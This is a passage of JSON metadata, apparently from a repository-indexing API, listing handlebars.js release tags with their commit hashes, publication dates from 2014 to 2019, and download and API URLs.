4:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/